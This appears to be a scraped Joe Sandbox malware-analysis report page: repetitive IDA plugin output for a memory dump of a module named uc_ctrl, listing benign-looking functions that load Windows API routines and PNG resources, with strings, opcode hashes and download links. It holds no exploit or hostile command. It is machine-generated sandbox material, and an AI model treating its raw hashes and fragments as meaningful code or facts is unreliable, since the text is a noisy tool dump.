Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: ae409e0bb8c2670dea012d69e31ee6c5a19586810effa17035b33b109e0ed21a
Instruction ID: d5e8d6418a49e34fc9e60eea0cb552d3b6fdffd3c078a85c8de27e42702635ae
Opcode Fuzzy Hash: ae409e0bb8c2670dea012d69e31ee6c5a19586810effa17035b33b109e0ed21a
Instruction Fuzzy Hash: 09116D31A12559AFDF129F698D0CAAFBBB8FF46324B504165F814E3240D734DA05CB92

Function 6CB9D830 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB9D837

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Strings

AQUA_, xrefs: 6CB9D885
IDX_OFFICE2007_STYLE, xrefs: 6CB9D844
BLACK_, xrefs: 6CB9D88C
BLUE_, xrefs: 6CB9D893
SILVER_, xrefs: 6CB9D87E

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3
String ID: AQUA_$BLACK_$BLUE_$IDX_OFFICE2007_STYLE$SILVER_
API String ID: 431132790-2717817858
Opcode ID: 3db2017f495e43164ea9db2030f45221a83b34773b83ede45539632cc975541e
Instruction ID: 997f57c77b9985771341129146b1f44f12582a5ffa0e4c5061b70f77fd9a2de1
Opcode Fuzzy Hash: 3db2017f495e43164ea9db2030f45221a83b34773b83ede45539632cc975541e
Instruction Fuzzy Hash: 70119171900189ABCB04DFF9CCD49FEB779AF52309B104639A125A7F81EB309A08CB51

Function 6CB5A237 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,PNG,?,?,6CC8E0D4,6CC8E0D4,?,6CB5B049,?,?,?,00000038,6CB59EFB), ref: 6CB5A259
LoadResource.KERNEL32(?,00000000,?,?,6CC8E0D4,6CC8E0D4,?,6CB5B049,?,?,?,00000038,6CB59EFB), ref: 6CB5A268
LockResource.KERNEL32(00000000,?,6CC8E0D4,6CC8E0D4,?,6CB5B049,?,?,?,00000038,6CB59EFB), ref: 6CB5A275
SizeofResource.KERNEL32(?,00000000,?,6CC8E0D4,6CC8E0D4,?,6CB5B049,?,?,?,00000038,6CB59EFB), ref: 6CB5A288
FreeResource.KERNEL32(00000000,00000000,00000000,?,6CC8E0D4,6CC8E0D4,?,6CB5B049,?,?,?,00000038,6CB59EFB), ref: 6CB5A29D

Strings

PNG, xrefs: 6CB5A250

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Resource$FindFreeLoadLockSizeof
String ID: PNG
API String ID: 4159136517-364855578
Opcode ID: 189f4cd84d051ab65e30762de75f815d4accb83a137027b7e68313ed5f24d1b2
Instruction ID: 754a060b2dcb23dfeb07e95123a03d50c4da02c6b0c24794e212037259dc7377
Opcode Fuzzy Hash: 189f4cd84d051ab65e30762de75f815d4accb83a137027b7e68313ed5f24d1b2
Instruction Fuzzy Hash: 09018F3A602555BF5B025F958C498BFBF7CEB4B2957044169FE00A3700DB729D128BB1

Function 6CB214AC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6CB214BE
GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 6CB214CE
EncodePointer.KERNEL32(00000000), ref: 6CB214D7
DecodePointer.KERNEL32(00000000), ref: 6CB214E5

Strings

uxtheme.dll, xrefs: 6CB214B9
BeginBufferedPaint, xrefs: 6CB214C8

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: BeginBufferedPaint$uxtheme.dll
API String ID: 2061474489-1632326970
Opcode ID: 5f99c09b75f6aa7f71115b3d46843524667808eec917e8541136371fe8ec8313
Instruction ID: 0bcf7944ca88adf7acb1ec08884004b334f84c923839d039b675eff0369e706a
Opcode Fuzzy Hash: 5f99c09b75f6aa7f71115b3d46843524667808eec917e8541136371fe8ec8313
Instruction Fuzzy Hash: 86F0B435702215BF9F125FE49C0886F3FBCEB0A6953485451FD1AD3610EB36CC218BA1

Function 6CB21CAD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6CB1B5DF,?,?,?,?), ref: 6CB21CBF
GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 6CB21CCF
EncodePointer.KERNEL32(00000000,?,?,6CB1B5DF,?,?,?,?), ref: 6CB21CD8
DecodePointer.KERNEL32(00000000,?,?,6CB1B5DF,?,?,?,?), ref: 6CB21CE6

Strings

kernel32.dll, xrefs: 6CB21CBA
RegisterApplicationRecoveryCallback, xrefs: 6CB21CC9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: RegisterApplicationRecoveryCallback$kernel32.dll
API String ID: 2061474489-202725706
Opcode ID: 6fce256df274ebf266c89c9640ec3d661e3f67c1da3e9a2e4828d481d8cab74a
Instruction ID: 9eedfa5fe25e89c435d768f6648007e217b1c91b11a393e22358b9e67f43ce61
Opcode Fuzzy Hash: 6fce256df274ebf266c89c9640ec3d661e3f67c1da3e9a2e4828d481d8cab74a
Instruction Fuzzy Hash: 1FF05B79712265FB9F015FA48D0896B3FBDAB077953094014FD09D7614EB39CC118FA1

Function 6CB21DD3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 6CB21DE5
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CB21DF5
EncodePointer.KERNEL32(00000000), ref: 6CB21DFE
DecodePointer.KERNEL32(00000000), ref: 6CB21E0C

Strings

shell32.dll, xrefs: 6CB21DE0
SHGetKnownFolderPath, xrefs: 6CB21DEF

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: SHGetKnownFolderPath$shell32.dll
API String ID: 2061474489-2936008475
Opcode ID: bdc774e176e0dad0231eeaabc40a56cbb68711a2486e5a7f353df90bcc1c5ee5
Instruction ID: bc5424f016f5b3d19f09369dd5196f0d5a0f602ecbe678d789751e49b1459919
Opcode Fuzzy Hash: bdc774e176e0dad0231eeaabc40a56cbb68711a2486e5a7f353df90bcc1c5ee5
Instruction Fuzzy Hash: E3F0BE31602255BBDF112F648C088AF3FB9EF0E6543084018FE09E7610EB39CC128AA2

Function 6CB21D6F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 6CB21D81
GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 6CB21D91
EncodePointer.KERNEL32(00000000), ref: 6CB21D9A
DecodePointer.KERNEL32(00000000), ref: 6CB21DA8

Strings

shell32.dll, xrefs: 6CB21D7C
SHCreateItemFromParsingName, xrefs: 6CB21D8B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2061474489-2320870614
Opcode ID: bebbc3572c312fb9cf8c9d9c5e34c0d2aa628b4dc79391068c6e17e6f9201227
Instruction ID: 5cc21a31ace9393fc5906c7dde763f8bd592c59dce9d8c1fb8e1f2df99411ba0
Opcode Fuzzy Hash: bebbc3572c312fb9cf8c9d9c5e34c0d2aa628b4dc79391068c6e17e6f9201227
Instruction Fuzzy Hash: B1F0B431602225FB9F011F65CC0896B3EB8AB066D57484814FD0997610DB3ADC118FA5

Function 6CB21E37 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(comctl32.dll), ref: 6CB21E49
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 6CB21E59
EncodePointer.KERNEL32(00000000), ref: 6CB21E62
DecodePointer.KERNEL32(00000000), ref: 6CB21E70

Strings

TaskDialogIndirect, xrefs: 6CB21E53
comctl32.dll, xrefs: 6CB21E44

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: TaskDialogIndirect$comctl32.dll
API String ID: 2061474489-2809879075
Opcode ID: 6ed871efcb4fa8e532770d3be0f53eec0c8a151ca425c8ab97eeab8e04508eb8
Instruction ID: 7e24d5595376f8a7242218fa5fffb1cc4dc31c8a565f3989b7246e7c630fe5ad
Opcode Fuzzy Hash: 6ed871efcb4fa8e532770d3be0f53eec0c8a151ca425c8ab97eeab8e04508eb8
Instruction Fuzzy Hash: 26F05436642255BBDF012F68CC0887B3FB9EB0A6553484424BD19A7A10DB39DC118BA1

Function 6CB21D11 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6CB1B5C3,?,?), ref: 6CB21D23
GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 6CB21D33
EncodePointer.KERNEL32(00000000,?,?,6CB1B5C3,?,?), ref: 6CB21D3C
DecodePointer.KERNEL32(00000000,?,?,6CB1B5C3,?,?), ref: 6CB21D4A

Strings

kernel32.dll, xrefs: 6CB21D1E
RegisterApplicationRestart, xrefs: 6CB21D2D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: RegisterApplicationRestart$kernel32.dll
API String ID: 2061474489-1259503209
Opcode ID: c799d3df132902c150a192330adc444af68ecb1ed43685fe273bb08f000c6b3a
Instruction ID: 040910bebe9f0e6fdbeda3c50effc001a8332d657b2573759950187667612b66
Opcode Fuzzy Hash: c799d3df132902c150a192330adc444af68ecb1ed43685fe273bb08f000c6b3a
Instruction Fuzzy Hash: 52F08235642265FB9F111E65980896A3FB8AB0B6957484025FE09D7A00EB39DC418AA5

Function 6CB21970 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6CB21982
GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 6CB21992
EncodePointer.KERNEL32(00000000), ref: 6CB2199B
DecodePointer.KERNEL32(00000000), ref: 6CB219A9

Strings

uxtheme.dll, xrefs: 6CB2197D
EndBufferedPaint, xrefs: 6CB2198C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: EndBufferedPaint$uxtheme.dll
API String ID: 2061474489-2993015961
Opcode ID: 11b5c7530b71d8dfa7362867f3ece288decaf23c756e5ef4972d8eeef8648a2c
Instruction ID: 42c09505d631ce3a3248b82521fbdaae25e483f89e09735eb7ba027eb3908677
Opcode Fuzzy Hash: 11b5c7530b71d8dfa7362867f3ece288decaf23c756e5ef4972d8eeef8648a2c
Instruction Fuzzy Hash: 0DF08C35A42211BB9F111F64980C86A3EF8DB0B7E93484525FD0AE7A14EB39DC429AE5

Function 6CB215B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 6CB215CA
GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6CB215DA
EncodePointer.KERNEL32(00000000), ref: 6CB215E3
DecodePointer.KERNEL32(00000000), ref: 6CB215F1

Strings

user32.dll, xrefs: 6CB215C5
ChangeWindowMessageFilter, xrefs: 6CB215D4

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 2061474489-2498399450
Opcode ID: 452f8707b9bd129cf052ae79295659ba233c0faca41f8a2b2b649ab6480a191a
Instruction ID: 50a7776a4110939ce3b5616da88b68cede0fc7329941ca1296bdf36a1724e802
Opcode Fuzzy Hash: 452f8707b9bd129cf052ae79295659ba233c0faca41f8a2b2b649ab6480a191a
Instruction Fuzzy Hash: A2F08234716225ABAF011EA4880886F3EBDEB076A531C5421BD09D3600EE75DD028AE5

Function 6CB21451 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6CB1A892,00000000,00000000,?,?,80070057), ref: 6CB21463
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 6CB21473
EncodePointer.KERNEL32(00000000,?,?,6CB1A892,00000000,00000000,?,?,80070057), ref: 6CB2147C
DecodePointer.KERNEL32(00000000,?,?,6CB1A892,00000000,00000000,?,?,80070057), ref: 6CB2148A

Strings

kernel32.dll, xrefs: 6CB2145E
ApplicationRecoveryInProgress, xrefs: 6CB2146D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: ApplicationRecoveryInProgress$kernel32.dll
API String ID: 2061474489-2899047487
Opcode ID: 69f6c5fa9c7209598750201d374eac2f6ab82e8553731c39b8b63e97bd52ce6d
Instruction ID: 3ee7dc785a3e927d538ab89da0d0f48c58ca75ab0793d4d2da87e9e6965dce0c
Opcode Fuzzy Hash: 69f6c5fa9c7209598750201d374eac2f6ab82e8553731c39b8b63e97bd52ce6d
Instruction Fuzzy Hash: 25F0A731B43721BB9B011B65C8188AE3EBC9B0766934D8415FD2ED7600EB29CC014EA5

Function 6CB21C11 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 6CB21C20
GetProcAddress.KERNEL32(00000000,InitNetworkAddressControl), ref: 6CB21C30
EncodePointer.KERNEL32(00000000), ref: 6CB21C39
DecodePointer.KERNEL32(00000000), ref: 6CB21C47

Strings

shell32.dll, xrefs: 6CB21C1B
InitNetworkAddressControl, xrefs: 6CB21C2A

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: InitNetworkAddressControl$shell32.dll
API String ID: 2061474489-1950653938
Opcode ID: 05d6c0e783abf2fb8562cd5523aa3585b884008943bdc34c813f5e0cb8c42e4d
Instruction ID: 9cf0d96302a50aef7d4c4a3349023b4948262829638949a28020274d5bb4b829
Opcode Fuzzy Hash: 05d6c0e783abf2fb8562cd5523aa3585b884008943bdc34c813f5e0cb8c42e4d
Instruction Fuzzy Hash: 7CE09275B17621BFAB012B749A0C56B3FB89B076593190455FD05F7608EA29CC0286A5

Function 6CB21C62 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(comctl32.dll), ref: 6CB21C71
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 6CB21C81
EncodePointer.KERNEL32(00000000), ref: 6CB21C8A
DecodePointer.KERNEL32(00000000), ref: 6CB21C98

Strings

TaskDialogIndirect, xrefs: 6CB21C7B
comctl32.dll, xrefs: 6CB21C6C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
